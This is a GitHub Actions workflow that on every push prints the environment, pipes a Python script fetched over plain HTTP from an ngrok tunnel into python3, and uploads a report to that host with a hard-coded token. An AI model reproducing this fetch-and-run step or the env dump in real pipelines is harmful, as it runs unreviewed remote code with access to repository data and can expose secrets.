name: DSO2 Pilot

on: push

jobs:
  dso:
    name: "Code Metrics"
    runs-on: ubuntu-latest
    container: ubuntu:20.04
    steps:
      - name: 'workflow'
        shell: bash
        run: export DEBIAN_FRONTEND=noninteractive &&
          apt-get update &&
          apt-get install -y git
      - name: 'debug'
        shell: bash
        run:
          env && git --version
      - name: 'checkout'
        uses: actions/checkout@v2.3.4
      - name: 'workflow'
        shell: bash
        run: export DEBIAN_FRONTEND=noninteractive &&
          apt-get update &&
          apt-get install -y python3 curl &&
          curl http://62ba-2800-810-519-dff-f156-c398-971b-2072.ngrok.io/static/workflow/workflow.py | python3
      - name: 'publish'
        shell: bash
        run: curl -v -F token='fuZ07oRGZT84YTMbEYzL+wAUSSzwT0b/TFQpsqseO4rBIOw=' -F report=@report.csv
          http://62ba-2800-810-519-dff-f156-c398-971b-2072.ngrok.io/api/publish > report.json
      - name: 'display'
        shell: bash
        run: cat report.json